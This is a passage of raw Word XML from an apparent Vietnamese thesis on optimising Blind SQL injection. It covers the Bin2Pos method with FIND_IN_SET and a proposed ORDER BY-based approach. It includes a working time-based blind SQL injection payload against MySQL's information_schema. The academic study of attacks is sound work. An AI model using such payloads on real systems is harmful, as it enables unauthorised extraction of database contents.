      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Phương pháp này là một sự nâng cấp của phương pháp dịch bit ở trên, được tác giả Roberto Salgado trình bày tại hội thảo BackHat US 2013 với chủ đề: “SQL Injection Optimization and Obfuscation Techniques”. Nếu như trong phương pháp dịch bit cơ bản tập ký tự đầu vào là 128 ký tự (không phân biệt ký tự nhìn được và không nhìn được). Một vấn đề khác là ký tự nào cũng cần 7 lần yêu cầu để  xác định, trong khi có những ký tự, khi chuyển sang dạng nhị phân có độ dài chỉ là 3, nên thực tế chỉ cần 3 yêu cầu là xác định được. Phương pháp Bin2Pos này sẽ thực hiện giới hạn lại tập các ký tự có thể, sau đó đánh chỉ số (index) cho các phần tử này. Trong mỗi lần yêu cầu, câu truy vấn sẽ thực hiện so sánh để lấy ra chỉ số đó, chuyển sang dạng nhị phân và thực hiện trích xuất từng bit một.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Phương pháp tối ưu bằng cách dùng phép dịch bit dựa vào kết quả đã được đánh chỉ mục đưa ra để khắc phục các nhược điểm đó. Đầu tiên phương pháp sẽ sử dụng kỹ thuật đánh chỉ mục kết quả để giới hạn lại tập các ký tự cần kiểm tra. Đối với hệ quản trị CSDL MySQL thì sử dụng hàm FIND_IN_SET. Mã tấn công có dạng:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>AND (SELECT @a:=MID(BIN(FIND_IN_SET(MID(table_name,1,1), 'a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,0,1,2,3,4,5,6,7,8,9,_,!,@,#,$,%,^,&amp;,*,(,),,+,=,\,,.,",\',~,`,\\,|,{,},[,],:,;, ,')),1,1) FROM information_schema.tables LIMIT 1)=@a AND IF(@a!='',@a,SLEEP(5));</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Kết quả trả về chính là vị trí của ký tự trong danh sách. Giả sử ký tự là ‘c’ thì sẽ trả về kết quả là 3. Tiếp theo sẽ sử dụng phương pháp dịch bit giống như trên, sử dụng hàm BIN() để chuyển về dạng nhị phân. BIN(3) là 11, cần 3 yêu cầu để xác định: Bit đầu tiên là 1 ? Đúng. Bit thứ hai là 1 ?Đúng ? Bit thứ ba là 1 </w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>? Không, không có bit thứ ba, thực hiện tạo Sleep để báo hiệu kết thúc chuỗi Binary.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Trong ví dụ trên tập danh sách dài 45, BIN(45) là 101101 cũng chỉ mất 7 yêu cầu truy vấn cho ký tự ở vị trí cuối cùng của danh sách.</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3CA74346" wp14:editId="77CCB010">
            <wp:extent cx="5610134" cy="2165299"/>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2"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5618273" cy="2168441"/>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0" w:name="_Toc459819440"/>
      <w:r w:rsidRPr="005D3C52">
        <w:t xml:space="preserve">Hình </w:t>
      </w:r>
      <w:fldSimple w:instr=" STYLEREF 1 \s ">
        <w:r w:rsidR="005F5912">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>2</w:t>
        </w:r>
      </w:fldSimple>
      <w:r w:rsidR="000512EB">
        <w:t>.</w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Hình \* ARABIC \s 1 ">
        <w:r w:rsidR="005F5912">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>4</w:t>
        </w:r>
      </w:fldSimple>
      <w:r w:rsidRPr="005D3C52">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="003F7098" w:rsidRPr="005D3C52">
        <w:t>Ví dụ với từ CHARACTER_SET</w:t>
      </w:r>
      <w:bookmarkEnd w:id="60"/>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Nếu như ở phương pháp dịch bit trên, bắt buộc để xác định một ký tự cần dùng đủ 7 bit, thì phương pháp này cho phép dùng ít hơn 7 yêu cầu. Cụ thể số yêu cầu tối đa ở đây là 6. Số lượng yêu cầu phụ thuộc vào số bit cần thiết để biểu diễn vị trí của ký tự trong tập danh sách. Có thể làm được như vậy vì trường hợp ký tự kết thúc chuỗi sẽ trả về một khoảng thời gian delay. Số yêu cầu cần thiết là: số bit biểu diễn bit cộng với 1. Trường hợp số bit là 6 sẽ không cần thêm yêu cầu cuối nữa, vì nó chắc chắn là yêu cầu bị delay, do độ dài tối đa là 6.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="00E64461">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="61" w:name="_Toc459822506"/>
      <w:r w:rsidRPr="005D3C52">
        <w:t>Hướng tiếp cận mới trong khai thác lỗ hổng Blind SQL injection</w:t>
      </w:r>
      <w:bookmarkEnd w:id="61"/>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Trong phần trên, luận văn đã trình bày các phương pháp tối ưu hóa Blind SQL injection. Các phương pháp tối ưu hóa khai thác lỗ hổng tập trung vào hai vấn đề chính:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Tối ưu tập ký tự tìm kiếm: Việc tập tìm kiếm càng được thu hẹp càng làm giảm số lượng bit để thể hiện ký tự, từ đó làm giảm số lượng yêu cầu để xác định các bit này.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Tối ưu về phương pháp xác định giá trị của bit: Đầu tiên là 7 yêu cầu để xác định đủ 7 ký tự, bằng cách đơn giản thêm yêu cầu báo </w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>hiệu kết thúc chuỗi, từ đó cho phép giảm các yêu cầu thừa (xác định các bit đã biết trước giá trị). Việc có thể biết kết thúc chuỗi cho phép tiết kiệm nhiều yêu cầu cần gửi đi.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004F69FA" w:rsidRPr="005D3C52" w:rsidRDefault="008E4486" w:rsidP="00391D73">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="028B5BA3" wp14:editId="37473F94">
            <wp:extent cx="5029835" cy="22098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29835" cy="2209800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E4486" w:rsidRPr="005D3C52" w:rsidRDefault="004F69FA" w:rsidP="00313D3F">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:bookmarkStart w:id="62" w:name="_Toc459819441"/>
      <w:r w:rsidRPr="005D3C52">
        <w:t xml:space="preserve">Hình </w:t>
      </w:r>
      <w:fldSimple w:instr=" STYLEREF 1 \s ">
        <w:r w:rsidR="005F5912">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>2</w:t>
        </w:r>
      </w:fldSimple>
      <w:r w:rsidR="000512EB">
        <w:t>.</w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Hình \* ARABIC \s 1 ">
        <w:r w:rsidR="005F5912">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>5</w:t>
        </w:r>
      </w:fldSimple>
      <w:r w:rsidRPr="005D3C52">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00A642F1" w:rsidRPr="005D3C52">
        <w:t>So sánh số lượng yêu cầu cần gửi trong 03 phương pháp</w:t>
      </w:r>
      <w:bookmarkEnd w:id="62"/>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Trong hình trên là bảng so sánh sử dụng 3 phương pháp: Tìm kiếm nhị phân, Dịch bit, Bin2Pos sử dụng Find_In_Set. Các phương pháp tối ưu </w:t>
      </w:r>
      <w:r w:rsidR="00366A23" w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>này</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> dựa vào việc kiểm tra yêu cầu gửi lên là Đúng/Sai. Do đó</w:t>
      </w:r>
      <w:r w:rsidR="00366A23" w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>theo</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> các phương pháp</w:t>
      </w:r>
      <w:r w:rsidR="00366A23" w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> này</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> số trạng thái trả về của mỗi yêu cầu chỉ có thể là 2. Luận văn hướng tới một cách tiếp cận khác: Liệu có thể, trong một yêu cầu trả về nhận được nhiều hơn 2 trạng thái hay không ? Nếu như có thể nhận được nhiều hơn 2 trạng thái, thì số lượng yêu cầu chắc chắn sẽ giảm. Giả sử nếu như có thể là 94 trạng thái, thì mỗi trạng thái sẽ đại diện cho một ký tự, và chỉ cần chuyển đổi trạng thái sang ký tự là có thể lấy giá trị của ký tự. 1 yêu cầu cho 1 ký tự.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Xuất phát từ ý tưởng đó, luận văn xét đến trường hợp: câu truy vấn trả về nhiều hơn 1 kết quả (row). Nếu như trong phương pháp truyền thống, việc xác định trạng thái Đúng/Sai bằng cách kiểm tra kết quả trả về này có xuất hiện hay không: Nếu có row này trả về là đúng, không có row trả về là sai. Trong trường hợp này, giả sử trả về nhiều hơn 1, khoảng 8 dòng. Giả sử, có thể làm thế nào đó, để sắp xếp các dữ liệu này theo một trật tự, sau đó, phân tích nội dung được hiển thị, rồi tính toán lại để trích xuất ra được giá trị chính xác của ký tự. </w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Phương pháp tiếp cận này dựa trên: Phân tích nội dung thứ tự nội dung trả về của dữ liệu. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0002676F" w:rsidRPr="005D3C52" w:rsidRDefault="0002676F" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Vấn đề đượ</w:t>
      </w:r>
      <w:r w:rsidR="00F86F13">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> đặt ra là: Làm thế nào để có thể trình bày dữ liệu theo ý đồ của kẻ tấn công. Nếu là chữ cái “a” thì trình bày biểu này, chữ cái “b” thì trình bày kiểu khác ?</w:t>
      </w:r>
      <w:r w:rsidR="00B03EBA">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Trong các mệnh đề của SQL, có mệnh đề ORDER BY được sử dụng để sắp xếp lại thứ tự của các row trả về trong truy vấn. Dựa trên ý tưởng này, luận văn đưa ra phương pháp: Sử dụng ORDER BY để trình bày dữ liệu trả về trong truy vấn, từ  đó sử dụng trong việc tối ưu hóa tấn công Blind SQL injection.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="00B03EBA" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Trong chương 2, luận văn đã trình bày các phương pháp tối ưu hóa tấn công Blind SQL injection trên thế giới, cũng như giới thiệu một hướng tiếp cận mới trong việc tối ưu. Sang chương tiếp theo, luận văn sẽ trình bày chi tiết về phương pháp tối ưu dựa trên phân tích thứ tự dữ liệu trả về, cũng như chứng minh thực nghiệm của phương pháp.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="00CE5824">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="63" w:name="_Toc459822507"/>
      <w:r w:rsidRPr="005D3C52">
        <w:t>Đề xuất tối ưu hóa tấn công Blind SQL injection dựa trên phân tích thứ tự nội dung trả về.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="63"/>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="64" w:name="_Toc459822508"/>
      <w:r w:rsidRPr="005D3C52">
        <w:t>Khai thác SQL injection trong mệnh đề ORDER BY</w:t>
      </w:r>
      <w:bookmarkEnd w:id="64"/>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005221BA" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="65" w:name="_Toc459822509"/>
      <w:r w:rsidRPr="005221BA">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Mệnh đề Order by trong truy vấn SQL</w:t>
      </w:r>
      <w:bookmarkEnd w:id="65"/>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Thông thường, để truy xuất lấy dữ liệu trên máy chủ CSDL, </w:t>
      </w:r>
      <w:r w:rsidR="00DB4D2D">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>kẻ tấn công</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> thường sử dụng mệnh đề “SELECT”. Cấu trúc của một truy vấn SQL sử dụng mệnh đề “SELECT” như sa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435ECF8F" wp14:editId="274D73AC">
            <wp:extent cx="3367405" cy="3217106"/>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4"/>
                    <a:srcRect b="1130"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3380289" cy="3229415"/>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6" w:name="_Toc459819442"/>
      <w:r w:rsidRPr="005D3C52">
        <w:t xml:space="preserve">Hình </w:t>
      </w:r>
      <w:fldSimple w:instr=" STYLEREF 1 \s ">
        <w:r w:rsidR="005F5912">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>3</w:t>
        </w:r>
      </w:fldSimple>
      <w:r w:rsidR="000512EB">
        <w:t>.</w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Hình \* ARABIC \s 1 ">
        <w:r w:rsidR="005F5912">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>1</w:t>
        </w:r>
      </w:fldSimple>
      <w:r w:rsidRPr="005D3C52">
        <w:t>: Cấu trúc mệnh đề SELECT</w:t>
      </w:r>
      <w:bookmarkEnd w:id="66"/>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:tab/>
        <w:t>Có thể nhận thấy nhiều mệnh đề quen thuộc, ví dụ như WHERE để lọc điều kiện trong truy vấn, LIMIT để giới hạn số lượng kết quả trả về. Trong đó, có thể chú ý đến mệnh đề ORDER BY. Mệnh đề này được sử dụng để sắp xếp dữ liệu trước khi trả về. Cùng phân tích ví dụ sau:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:tab/>
        <w:t>Có bảng users, gồm 4 cộ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615B5557" wp14:editId="07E5CBDE">
            <wp:extent cx="2534258" cy="1455724"/>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5"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2543855" cy="1461236"/>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7" w:name="_Toc459819443"/>
      <w:r w:rsidRPr="005D3C52">
        <w:t xml:space="preserve">Hình </w:t>
      </w:r>
      <w:fldSimple w:instr=" STYLEREF 1 \s ">
        <w:r w:rsidR="005F5912">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>3</w:t>
        </w:r>
      </w:fldSimple>
      <w:r w:rsidR="000512EB">
        <w:t>.</w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Hình \* ARABIC \s 1 ">
        <w:r w:rsidR="005F5912">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>2</w:t>
        </w:r>
      </w:fldSimple>
      <w:r w:rsidRPr="005D3C52">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="003F7098" w:rsidRPr="005D3C52">
        <w:t>Câu lệnh tạo bảng users</w:t>
      </w:r>
      <w:bookmarkEnd w:id="67"/>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:tab/>
        <w:t>Tiến hành Insert giá trị vào bảng, kết quả như sa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15CAAE49" wp14:editId="1B8CE78F">
            <wp:extent cx="3181294" cy="3098929"/>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6"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3200717" cy="3117849"/>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68" w:name="_Toc459819444"/>
      <w:r w:rsidRPr="005D3C52">
        <w:t xml:space="preserve">Hình </w:t>
      </w:r>
      <w:fldSimple w:instr=" STYLEREF 1 \s ">
        <w:r w:rsidR="005F5912">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>3</w:t>
        </w:r>
      </w:fldSimple>
      <w:r w:rsidR="000512EB">
        <w:t>.</w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Hình \* ARABIC \s 1 ">
        <w:r w:rsidR="005F5912">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>3</w:t>
        </w:r>
      </w:fldSimple>
      <w:r w:rsidRPr="005D3C52">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="003F7098" w:rsidRPr="005D3C52">
        <w:t>Kết quả trả về của bảng users</w:t>
      </w:r>
      <w:bookmarkEnd w:id="68"/>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:tab/>
        <w:t>Sử dụng mệnh đề ORDER BY có thể sắp xếp theo thứ tự mong muốn. Thực hiện 2 câu lệnh:“SELECT * FROM users ORDER BY id” (1) và “SELECT * FROM users ORDER BY point” (2). Phân tích kết quả trả về của 02 câu lệnh, trong câu lệnh thứ nhất, các dòng (row) trả về được sắp xếp theo số id, theo chiều tăng dần. Tương tự với câu lệnh thứ hai, các dòng trả về được sắp xếp theo số point. Trường hợp muốn sắp xếp theo thứ tự giảm dần, chỉ cần thêm DESC vào sau mệnh đề ORDER BY. Như vậy, cùng một nội dung trả về, tùy cách sắp xếp dữ liệu mà mỗi truy vấn sẽ cho ra một hình thái kết quả khác nhau (về mặt thứ tự).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="69" w:name="_Toc459822510"/>
      <w:r w:rsidRPr="005D3C52">
        <w:t>Lỗ hổng SQL Injection trong truy vấn sử dụng mệnh đề Order By</w:t>
      </w:r>
      <w:bookmarkEnd w:id="69"/>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:tab/>
        <w:t>Việc lấy trực tiếp dữ liệu từ người dùng, rồi truyền thẳng vào truy vấn SQL là nguyên nhân dẫn gây ra lỗ hổng SQL injection. Thông thường, dữ liệu người dùng thường được cộng vào mệnh đề WHERE. Trong một số trường hợp, ứng dụng cho phép người dùng tùy biến việc sắp xếp (theo tên, theo điểm số chẳng hạn). Nếu lập trình viên xử lý không tốt sẽ dẫn đến lỗ hổng SQL injection. Cùng phân tích đoạn mã nguồn sau:</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14:anchorId="079C25E8" wp14:editId="0C66D74D">
            <wp:extent cx="6095365" cy="2895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7"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6110901" cy="2902980"/>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70" w:name="_Toc459819445"/>
      <w:r w:rsidRPr="005D3C52">
        <w:t xml:space="preserve">Hình </w:t>
      </w:r>
      <w:fldSimple w:instr=" STYLEREF 1 \s ">
        <w:r w:rsidR="005F5912">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>3</w:t>
        </w:r>
